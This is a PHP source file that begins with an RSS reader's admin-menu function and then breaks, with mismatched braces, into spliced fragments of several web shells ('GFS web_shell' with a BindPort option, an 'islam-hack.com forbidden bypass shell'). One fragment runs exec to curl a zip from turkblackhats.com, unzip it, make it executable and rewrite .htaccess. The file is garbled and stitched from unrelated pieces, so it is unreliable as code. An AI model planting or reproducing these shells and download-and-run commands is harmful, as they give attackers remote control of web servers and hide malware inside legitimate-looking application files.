/**
* main function. checks for authorization and renders the
* required admin section.
*/
function admin_main($authorised)
{
echo "\n<div id=\"channel_admin\" class=\"frame\">";
if ($authorised) {
admin_menu();
if (array_key_exists(CST_ADMIN_DOMAIN, $_REQUEST)) {
switch ($_REQUEST[CST_ADMIN_DOMAIN]) {
case CST_ADMIN_DOMAIN_FOLDER:
$show = folder_admin();
break;
case CST_ADMIN_DOMAIN_CHANNEL:
$show = channel_admin();
break;
case CST_ADMIN_DOMAIN_CONFIG:
$show = config_admin();
break;
case CST_ADMIN_DOMAIN_ITEM:
$show = item_admin();
break;
case CST_ADMIN_DOMAIN_PLUGINS:
$show = plugins_admin();
break;
case CST_ADMIN_DOMAIN_THEMES:
$show = themes_admin();
break;
case CST_ADMIN_DOMAIN_TAGS:
$show = tags_admin();
break;
case CST_ADMIN_DOMAIN_PLUGIN_OPTIONS:
$show = plugin_options_admin();
break;
case CST_ADMIN_DOMAIN_THEME_OPTIONS:
$show = theme_options_admin();
break;
default:
break;
}
}
if (array_key_exists(CST_ADMIN_VIEW, $_REQUEST) || isset($show)) {
if (!isset($show)) {
$show = $_REQUEST[CST_ADMIN_VIEW];
}
switch ($show) {
case CST_ADMIN_DOMAIN_CONFIG:
config();
break;
case CST_ADMIN_DOMAIN_CHANNEL:
channels();
break;
case CST_ADMIN_DOMAIN_FOLDER:
folders();
break;
case CST_ADMIN_DOMAIN_OPML:
opml();
break;
case CST_ADMIN_DOMAIN_NONE:
break;
case CST_ADMIN_DOMAIN_ITEM:
items();
break;
case CST_ADMIN_DOMAIN_SYSINFO:
sysinfo();
break;
case CST_ADMIN_DOMAIN_DASHBOARD:
dashboard();
break;
case CST_ADMIN_DOMAIN_PLUGINS:
plugins();
break;
case CST_ADMIN_DOMAIN_THEMES:
themes();
break;
case CST_ADMIN_DOMAIN_TAGS:
tags();
break;
case CST_ADMIN_DOMAIN_PLUGIN_OPTIONS:
plugin_options();
break;
case CST_ADMIN_DOMAIN_THEME_OPTIONS:
theme_options();
break;
default:
}
} else {
if (true == getConfig('rss.config.defaultdashboard')) {
dashboard();
} else {
channels();
}
}
echo "\n<div class=\"clearer\"></div>\n";
} else {
rss_error(sprintf(__('<h1>Not Authorized!</h1>You are not authorized to access the administration interface. Please follow <a href="%s">this link</a> back to the main page. Have a nice day!'), getPath()), RSS_ERROR_ERROR, true);
}
echo "</div>\n";
}
mysql_close($conn_id);
}
}
echo "</table>";
}
}
}
////////////////////////////////////////////////////////////////////////////////
///////////////////////////////// КОД //////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
echo $HTML;
echo "<font face=Verdana size=2 color=blue><b>";
echo rep_char(" ", 15);
echo "GFS web_shell ver 3.1.7 </b></font>";
echo "<hr size=3 color=black>";
sysinfo();
echo "<form action=\"" . $HTTP_REFERER . "\" method=\"POST\" enctype=\"multipart/form-data\">";
echo "<table BORDER=1 align=center>";
if ($r_act == "nav" or $r_act == NULL) {
echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"nav\"><b>Navigation</b></td>";
} else {
echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio name=\"r_act\" value=\"nav\"><b>Navigation</b></td>";
}
if (!$safe_mode) {
if ($r_act == "bind") {
echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"bind\"><b>BindPort</b></td>";
} else {
echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"bind\"><b>BindPort</b></td>";
}
}
if (function_exists(fsockopen)) {
$a = 65;
$b = 90;
}
if ($part == 3) {
$a = 97;
$b = 122;
}
$code_part = chr(rand($a, $b));
@($newcode_length = $newcode_length + 1);
@($newcode = $newcode . $code_part);
}
return $newcode;
}
# PHP Variables :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: PHP Variables #
echo "<CENTER>\n <table border='1' cellpadding='0' cellspacing='0' style='border-collapse: collapse; border-style: solid; border-color: #C0C0C0; padding-left: 4; padding-right: 4; padding-top: 1; padding-bottom: 1' bordercolor='#111111' width='86%' bgcolor='#E0E0E0'>\n <tr>\n <td bgcolor='#AA0000' class='td'><div align='center' class='style4'>: www.islam-hack.com forbidden bypass shell : </div></td>\n </tr>\n <tr>\n <td style='padding:5px 5px 5px 5px '>";
echo sysinfo();
echo "\t </td>\n </tr>\n <tr>\n <td bgcolor='#AA0000' class='td' style='padding:0px 0px 0px 5px'><div align='center' class='style4'>\n <div align='left'>\n <form name='form4' method='post' action=''>\n View Directory : \n <input name='GoDir' type='text' class='DIR' id='GoDir' size='120'>\n </form>\n </div>\n </div></td>\n </tr>\n <tr>\n <td width='100%' height='280' style='padding:20px 20px 20px 20px '>";
if (isset($_POST['Submit2'])) {
@mkdir("bomba");
@chdir("bomba");
@exec('curl http://turkblackhats.com/priv/ln.zip -o ln.zip');
@exec('unzip ln.zip');
@exec('chmod 755 ln');
echo '<font color=green>[+] Directory [ bomba ] Created .</font><Br>';
echo '<font color=green>[+] Directory Changed .</font><Br>';
$file3 = 'Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php';
$fp3 = fopen('.htaccess', 'w');
$fw3 = fwrite($fp3, $file3);